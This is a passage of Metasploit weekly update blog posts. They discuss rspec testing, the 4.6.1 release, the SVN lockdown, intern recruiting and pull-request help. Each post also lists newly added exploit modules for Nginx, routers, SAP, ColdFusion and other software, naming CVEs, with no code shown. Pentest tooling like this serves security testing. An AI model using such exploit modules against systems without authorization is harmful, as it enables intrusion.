decade, so bitrot has set in pretty hard.  Few of these tests still work, so it was best to just toss them and move on with rspec. If you're of a mind to fix or extend core Metasploit functionality, when you write your fix, it would be delightful if you paid attention to the spec/ subdirectory. You can learn a lot from the several hundred example tests that are already there. Being able to prove that your patch actually fixes the problem described makes reviewing your pull request move along much, much faster. Tests can also do double duty as documentation of what you're expecting to happen. In fact, if you were to write fixes and features following TDD (test-driven design), you'd do something like this: Write an rspec test that fails, because it's hitting a bug or exercising an unwritten feature. Commit that. Write your fix or feature. Run your rspec test again, and see it succeed. Do a little dance and commit that, and send up a pull request. You will probably uncover more of your feature or fix as you're writing; that's okay, just add another test before you start writing a fix. In this day and age of split windows and featureful IDEs, there's really no reason to avoid this kind of back-and-forth development. If you want to recover the old tests, it's as simple as checking out Metasploit Framework's unstable branch on GitHub, and running a quick find . -name *\.u[ts]\.rb to locate them. About the only reason I can think of to do this is to port the tests that (used to) cover some core Rex, Railgun, and Meterpreter functionality. In fact, doing just that would make a fine summer past time for you infosec kids who are off for the next couple months. Testing Metasploit modules is a little different. Ask anyone who knows Ruby pretty well, and they'll agree that Metasploit modules are a little... weird. They also tend to require some very specific, not-very-mockable environmental elements (like functional targets configured with specific vulnerabilities), so the usual rspec route doesn't work out too well with them. We're working on open sourcing some of our QA practices on how to test those as well, though, so stay tuned and keep an eye on the test/modules directory. A bunch of excitement should be landing there soon. New Modules In addition to the Nginx vulnerabilitu, we've got new modules for Firefox, IBM SPSS, and Adobe Reader. Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow by Greg MacManus, hal, and saelo exploits CVE-2013-2028 Firefox 17.0.1 Flash Privileged Code Injection by sinn3r, Marius Mlynski, and joev exploits CVE-2013-0757 IBM SPSS SamplePower C1Tab ActiveX Heap Overflow by juan vazquez and Alexander Gavrun exploits CVE-2012-5946 AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass by juan vazquez and Felipe Andres Manzano exploits CVE-2013-2730 Availability If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: 4.6.1, ColdFusion Exploit, and SVN Lockdown

Metasploit 4.6.1 ReleasedThis week's update bumps the patch version of Metasploit to 4.6.1 (for installed versions of Metasploit). The major change here is the ability to install Metasploit on Windows 8 and Windows Server 2012. That meant we had to fiddle…

Metasploit 4.6.1 ReleasedThis week's update bumps the patch version of Metasploit to 4.6.1 (for installed versions of Metasploit). The major change here is the ability to install Metasploit on Windows 8 and Windows Server 2012. That meant we had to fiddle with the installer and a few of Metasploit Pro's dependencies to get that all working correctly, and that led to skipping last week's release so we could be sure all the moving parts lined up correctly.This release also fixes a few minor issues in Metasploit Pro that affected a handful of users -- you can read up on what exactly has changed in the release notes. As usual, it's a little bigger than you might expect from your typical update, given the changes in the installer code, so give it a couple extra minutes to download and do its update thing.Intern Found!If you've been watching this space, you'll know that we've been on the prowl for a summer intern. Welp, the search is over -- we've managed to pick up a well-qualified college student who has a strong background in both IT ops and exploit dev. If you have Pull Requests in the metasploit-framework backlog, or aging bugs in the Redmine Issue Tracker, then you should expect to meet him soon as he validates your pulls and bugs and gets your stuff back on track (or mercilessly axed).Of course, this sort of backlog validation doesn't have to land on in paid intern's lap. If you're looking to beef up your resume, know a thing or two about IT security and Ruby, and are handy with VMware or Vagrant, you are more than welcome to throw in as well. We can always use extra validation inputs to our bugs and PR's. Even if you're not here in the Mazes of Metasploit, fixing bugs and getting your name attached to Metasploit commits is a pretty decent reference all by itself, paid or not.SVN is Still Mostly DeadThis week we've locked up our SVN server at http://www.metasploit.com/svn with a pretty unguessable username and password. This is to discourage people from following the piles of pre-2011 documentation that's out there. The SVN lockdown is described at http://r-7.co/MSF-SVN in more detail, but the moral of the story is, don't even try to guess the password, and don't try to use your e-mail password or GitHub password or anything like that. The whole point of this new behavior is to merely transmit the instructions to move to Git in the WWW-Authenticate header.New ModulesWe've a fairly huge bucket full of exploits and auxiliary modules this week. Sixteen total, mostly around our 2013 theme of home access points and SAP installations. We're also shipping Juan's 1Day exploit for Mutiny appliances this week, as well as an exe dropper for SSH sessions from Spencer McIntyre and Brandon Knight.Oh, and did you hear about the Linode compromise? Part of the incident centered around recent ColdFusion bugs. Now, I'm sure ColdFusion is a delightful language to work in and if you're CFM artiste, you probably have a ball every day working on your codebase. That said, it's not super popular language here in the 21st Century. This usually means that you're stuck with legacy-flavored security bugs, like the directory traversal vulnerability exercised by Hack The Planet and ported to Metasploit by Wei @_sinn3r Chen.D-Link DIR615h OS Command Injection by juan vazquez and Michael Messner exploits OSVDB-90174Linksys WRT160nv2 apply.cgi Remote Command Injection by juan vazquez and Michael Messner exploits OSVDB-90093Mutiny 5 Arbitrary File Upload by juan vazquez exploits CVE-2013-0136Kloxo Local Privilege Escalation by juan vazquez and HTPSAP Management Console OSExecute Payload Execution by juan vazquez and Chris John RileySAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution by nmonkeeSAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution by nmonkeeSSH User Code Execution by Brandon Knight and Spencer McIntyre exploits CVE-1999-0502ERS Viewer 2011 ERS File Handling Buffer Overflow by juan vazquez and Parvez Anwar exploits CVE-2013-0726DLink DSL 320B Password Extractor by Michael Messner exploits OSVDB-93013Mutiny 5 Arbitrary File Read and Delete by juan vazquez exploits CVE-2013-0136SAP SOAP EPS_DELETE_FILE File Deletion by Alexey Sintsov and nmonkee exploits OSVDB-74780ColdFusion 'password.properties' Hash Extraction by sinn3r and HTP exploits OSVDB-93114CouchDB Enum Utility by espretoSAP CTC Service Verb Tampering User Management by Alexandr Polyakov and nmonkeeSAP SMB Relay Abuse by Alexey Tyurin and nmonkeeSAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure by nmonkeeAvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Pull Request Wrangling

Pull Requests: Want to help?Metasploit has a first world problem: We get so much code from contributors out in the world, it gets hard to keep up. Most open source projects aren't popular enough to warrant more than three or four contributors, total. Metasploit…

Pull Requests: Want to help?Metasploit has a first world problem: We get so much code from contributors out in the world, it gets hard to keep up. Most open source projects aren't popular enough to warrant more than three or four contributors, total. Metasploit has over two hundred, last I checked. We're no Rails (those guys have over 2,000 contributors), but for security software, that's not too bad.The problem is, our backlog of outstanding pull requests (PRs) is steadily increasing, and now we're now floating about a hundred outstanding pull requests. Since Metasploit is fundamentally a communal effort, I'm hopeful that you generous folks out there in Open Source Land can maybe help us take a bite out of this backlog.First off, check out the new Landing a Pull Request guide. While you might think that this guide is meant only for Rapid7 employees, it's not. The power of GitHub as a source control management system lies in the ability for literally anyone to contribute fixes in a distributed way. Let me quote from the Collaboration between Contributorssection:If Alice knows a solution to Bob's pull request that Juan pointed out, it is easy for Alice to provide that solution by following [this procedure]. Git blame will still work correctly, commit histories will all be accurate, everyone on the pull request will be notified of Alice's changes, and Juan doesn't have to wait around for Bob to figure out how to use send_request_cgi() or whatever the problem was."What this means is that if you see something languishing in our pull queue, and you think you can help move things along, go for it! Most of the time, PRs don't get landed due to a lack of verification or testing. So, while some old PR might get solved with some bugfixes, more likely, what we really need is some solid verification procedure to prove that the PR actually works. Even better, for non-module PRs, would be some rspec tests added to the outstanding PR. Merely 1'ing a PR isn't likely to be very helpful, but squeaky wheels do get greased. The point is, the opportunities to collaborate on advancing the state of the art in open source security development really are there for the taking.Intern SoughtSpeaking of contributing, summer is approaching, and that means it's time to start trolling (trawling?) for interns. We have a pretty formidible job description up, but if you're reading this blog, you probably already have some deep and abiding interest in open source security software, so feel free to pop your resume off to me at todb at metasploit dot com. If you already live here in Austin, then hooray for you, since this internship requires a fair amount of in-person showing up to the office. If you already have contributed code to Metasploit or some other open source project, then you are already way ahead of the game and I would be very interested in talking to you.If interning isn't your thing, but you know an enterprising college student who might be a good fit, give them the shortlink: http://r-7.co/MSF-INTERN.Armitage and MSFGuiFinally, as mentioned in the Metasploit 4.6.0 release notes, we've removed the two alternate Java front ends, Armitage and MSFGui, from Metasploit's main distributions. Those projects, run by Raphael @armitagehacker Mudge and Matthew @scriptjunkie Weeks, respectively, are now being distributed separately from the framework source repository. You can track them at http://www.fastandeasyhacking.com/manual (for Armitage) and http://www.scriptjunkie.us/msfgui/ (for MSFGui). So, if you are sitting on a source checkout of Metasploit and you find that your Java client doesn't work any more, that's probably why. You can get your install back in shape by just fetching from upstream, direct from those guys.New ModulesWe've got four new modules this week. We've been busy preparing for conference season, so module throughput has been a little slower than usual.MediaWiki SVG XML Entity Expansion Remote File Access by juan vazquez, Christian Mehlmauer, and Daniel Franke exploits OSVDB-92490Netgear DGN2200B pppoe.cgi Remote Command Execution by juan vazquez and Michael Messner exploits OSVDB-90320Java Applet Reflection Type Confusion Remote Code Execution by juan vazquez and Jeroen FrijtersFree Float FTP Server USER Command Buffer Overflow by D35m0nd142 and Doug Prostko exploits OSVDB-69621AvailabilityIf you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Featured Research

National Exposure Index 2017

The National Exposure Index is an exploration of data derived from Project Sonar, Rapid7's security research project that gains insights into global exposure to common vulnerabilities through internet-wide surveys.

Learn More

Toolkit

Make Your SIEM Project a Success with Rapid7

In this toolkit, get access to Gartner's report “Overcoming Common Causes for SIEM Solution Deployment Failures,” which details why organizations are struggling to unify their data and find answers from it. Also get the Rapid7 companion guide with helpful recommendations on approaching your SIEM needs.

Download Now

Podcast

Security Nation

Security Nation is a podcast dedicated to covering all things infosec – from what's making headlines to practical tips for organizations looking to improve their own security programs. Host Kyle Flaherty has been knee–deep in the security sector for nearly two decades. At Rapid7 he leads a solutions-focused team with the mission of helping security professionals do their jobs.

Listen Now